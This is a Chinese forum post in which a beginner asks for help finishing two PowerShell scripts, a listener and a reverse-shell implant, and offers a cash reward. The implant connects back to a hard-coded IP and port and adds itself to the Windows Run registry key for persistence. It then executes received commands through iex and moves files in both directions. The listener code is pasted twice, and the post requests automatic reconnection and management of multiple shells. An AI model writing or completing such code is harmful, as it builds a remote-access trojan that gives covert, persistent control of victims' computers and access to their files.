需求是这样的。
1.一共两个ps1脚本
第一个 客户端:监听xxxx端口,服务端则反弹shell到客户端监听端口,然后客户端可以输出cmd,上传下载,等功能。
需求:
1.服务端每隔30秒反弹一次shell到客户端,如果服务端检测到当前与客户端是连接状态则不反弹,如果非链接状态则开始反弹。
2.客户端写一个列表功能,也就是可以支持对服务端反弹回来的多个shell进行批量管理。
萌新:如若有英雄帮忙一下,回头请留下联系方式,红包奉上!
$port=8001 # Create server $endpoint = New-Object System.Net.IPEndPoint([System.Net.IpAddress]::Any, $port) $listener = New-Object System.Net.Sockets.TcpListener($endpoint) $listener.Start() Write-Host 'Listening on port'$port'...' # Wait for connection $client = $listener.AcceptTcpClient() $stream = $client.GetStream() $reader = New-Object System.IO.StreamReader($stream) $writer = New-Object System.IO.StreamWriter($stream) Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] Connection established ! Function GetBinaryContent($filename){ $file_binary_content = [System.IO.File]::ReadAllBytes($filename) return $file_binary_content } Function ExecCmd(){ echo "Input Command:" $cmd = Read-Host $writer.WriteLine($cmd) $writer.Flush() $output = $reader.ReadLine() echo $output } Function Upload(){ echo "Input A Local File :" $local_file = Read-Host $local_binary_content = GetBinaryContent($local_file) $local_binary_content_len = $local_binary_content.Length $file_string_content = [string] $local_binary_content $writer.WriteLine($file_string_content) $writer.Flush() echo "Input Destination :" $dest_file = Read-Host $writer.WriteLine($dest_file) $writer.Flush() $new_file_len = $reader.ReadLine() $success = "File Upload Successfully." $failed = "File Upload Failed." if($new_file_len -eq $local_binary_content_len){ Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $success } elseif($new_file_len -ne $local_binary_content_len){ Write-Host [ -NoNewline;Write-Host * -Fore Red -NoNewline;Write-Host ] $failed } } Function Download(){ echo "Input A Remote File:" $remote_file = Read-Host $writer.WriteLine($remote_file) $writer.Flush() $remote_file_string_content = $reader.ReadLine() $remote_file_string_content_split = $remote_file_string_content.Split(" ") $remote_file_bianry_len = $remote_file_string_content_split.Count $download_byte_array = New-Object Byte[] $remote_file_bianry_len for([int]$i = 0; $i -lt $remote_file_bianry_len; $i++){ $download_byte_array[$i] = $remote_file_string_content_split[$i] } echo "Input Local Filename :" $local_filename = Read-Host [System.IO.File]::WriteAllBytes($local_filename, $download_byte_array) $new_file_binary_content = [System.IO.File]::ReadAllBytes($local_filename) $new_file_binary_len = $new_file_binary_content.Count $writer.WriteLine($new_file_binary_len) $writer.Flush() $result = $reader.ReadLine() Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $result } while($true){ echo "[1] Exec Command." echo "[2] Upload File." echo "[3] Download File." echo "[4] Exit." echo "Input Command Type :" $cmd_type = Read-Host if($cmd_type -eq "1"){ $writer.WriteLine($cmd_type) $writer.Flush() ExecCmd } elseif($cmd_type -eq "2"){ $writer.WriteLine($cmd_type) $writer.Flush() Upload } elseif($cmd_type -eq "3"){ $writer.WriteLine($cmd_type) $writer.Flush() Download } elseif($cmd_type -eq "4"){ $writer.WriteLine($cmd_type) $writer.Flush() break }else{ continue } echo "========================================" echo "" } kk1$port=8001 # Create server $endpoint = New-Object System.Net.IPEndPoint([System.Net.IpAddress]::Any, $port) $listener = New-Object System.Net.Sockets.TcpListener($endpoint) $listener.Start() Write-Host 'Listening on port'$port'...' # Wait for connection $client = $listener.AcceptTcpClient() $stream = $client.GetStream() $reader = New-Object System.IO.StreamReader($stream) $writer = New-Object System.IO.StreamWriter($stream) Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] Connection established ! Function GetBinaryContent($filename){ $file_binary_content = [System.IO.File]::ReadAllBytes($filename) return $file_binary_content } Function ExecCmd(){ echo "Input Command:" $cmd = Read-Host $writer.WriteLine($cmd) $writer.Flush() $output = $reader.ReadLine() echo $output } Function Upload(){ echo "Input A Local File :" $local_file = Read-Host $local_binary_content = GetBinaryContent($local_file) $local_binary_content_len = $local_binary_content.Length $file_string_content = [string] $local_binary_content $writer.WriteLine($file_string_content) $writer.Flush() echo "Input Destination :" $dest_file = Read-Host $writer.WriteLine($dest_file) $writer.Flush() $new_file_len = $reader.ReadLine() $success = "File Upload Successfully." $failed = "File Upload Failed." if($new_file_len -eq $local_binary_content_len){ Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $success } elseif($new_file_len -ne $local_binary_content_len){ Write-Host [ -NoNewline;Write-Host * -Fore Red -NoNewline;Write-Host ] $failed } } Function Download(){ echo "Input A Remote File:" $remote_file = Read-Host $writer.WriteLine($remote_file) $writer.Flush() $remote_file_string_content = $reader.ReadLine() $remote_file_string_content_split = $remote_file_string_content.Split(" ") $remote_file_bianry_len = $remote_file_string_content_split.Count $download_byte_array = New-Object Byte[] $remote_file_bianry_len for([int]$i = 0; $i -lt $remote_file_bianry_len; $i++){ $download_byte_array[$i] = $remote_file_string_content_split[$i] } echo "Input Local Filename :" $local_filename = Read-Host [System.IO.File]::WriteAllBytes($local_filename, $download_byte_array) $new_file_binary_content = [System.IO.File]::ReadAllBytes($local_filename) $new_file_binary_len = $new_file_binary_content.Count $writer.WriteLine($new_file_binary_len) $writer.Flush() $result = $reader.ReadLine() Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $result } while($true){ echo "[1] Exec Command." echo "[2] Upload File." echo "[3] Download File." echo "[4] Exit." echo "Input Command Type :" $cmd_type = Read-Host if($cmd_type -eq "1"){ $writer.WriteLine($cmd_type) $writer.Flush() ExecCmd } elseif($cmd_type -eq "2"){ $writer.WriteLine($cmd_type) $writer.Flush() Upload } elseif($cmd_type -eq "3"){ $writer.WriteLine($cmd_type) $writer.Flush() Download } elseif($cmd_type -eq "4"){ $writer.WriteLine($cmd_type) $writer.Flush() break }else{ continue } echo "========================================" echo "" }
第二个服务端:
$address = '192.168.1.8' $port = 8001 $autorunKeyName = "Windows Powershell" $autorunKeyVal = $MyInvocation.MyCommand.Path $autoruns = Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run if (-not $autoruns.$autorunKeyName) { New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal } elseif($autoruns.$autorunKeyName -ne $autorunKeyVal) { Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal } while ($true) { do { try { Write-Host “Trying to reach “$address”:”$port $client = New-Object System.Net.Sockets.TcpClient($address, $port) $stream = $client.GetStream() $writer = New-Object System.IO.StreamWriter($stream) $write. $reader = New-Object System.IO.StreamReader($stream) Start-Sleep -s 10 } catch { Write-Host "failed on tcp connect." } } while ($true) Write-Host "Connected" do{ $cmd_type = $reader.ReadLine() echo $cmd_type if($cmd_type -eq "1"){ echo "Command Type : Exec Command." $cmd = $reader.ReadLine() try{ $output = [string](iex $cmd) } catch{ $output = $_.Exception.Message } $writer.WriteLine($output) $writer.Flush() } elseif($cmd_type -eq "2"){ echo "Command Type : Upload File." $file_string_content = $reader.ReadLine() $file_string_content_split = $file_string_content.Split(" ") $file_string_content_split_len = $file_string_content_split.Count echo $file_string_content_split_len $byte_array = New-Object Byte[] $file_string_content_split_len for([int] $i = 0; $i -lt $file_string_content_split_len; $i++){ $byte_array[$i] = $file_string_content_split[$i] } $dest_file = $reader.ReadLine() [System.IO.File]::WriteAllBytes($dest_file, $byte_array) $new_file_content = [System.IO.File]::ReadAllBytes($dest_file) $new_file_content_len = $new_file_content.Length $writer.WriteLine($new_file_content_len) $writer.Flush() } elseif($cmd_type -eq "3"){ echo "Command Type : Download File." $local_file = $reader.ReadLine() $local_binary_content = [System.IO.File]::ReadAllBytes($local_file) $local_string_content = [string]$local_binary_content $writer.WriteLine($local_string_content) $writer.Flush() $remote_file_len = $reader.ReadLine() $local_file_len = $local_binary_content.Count if($remote_file_len -eq $local_file_len){ $writer.WriteLine("Download Successfully.") $writer.Flush() } elseif($remote_file_len -ne $local_file_len){ $writer.WriteLine("Download Failed.") $writer.Flush() } } elseif($cmd_type -eq "4"){ Write-Host "Exiting" $writer.Close() $reader.Close() $stream.Close() $client.Close() exit break } else{ continue } }while($true) # Clean up $writer.Close() $reader.Close() $stream.Close() $client.Close() }
抱歉,暂时不了解这个编辑器的功能,代码贴错误了。抱歉!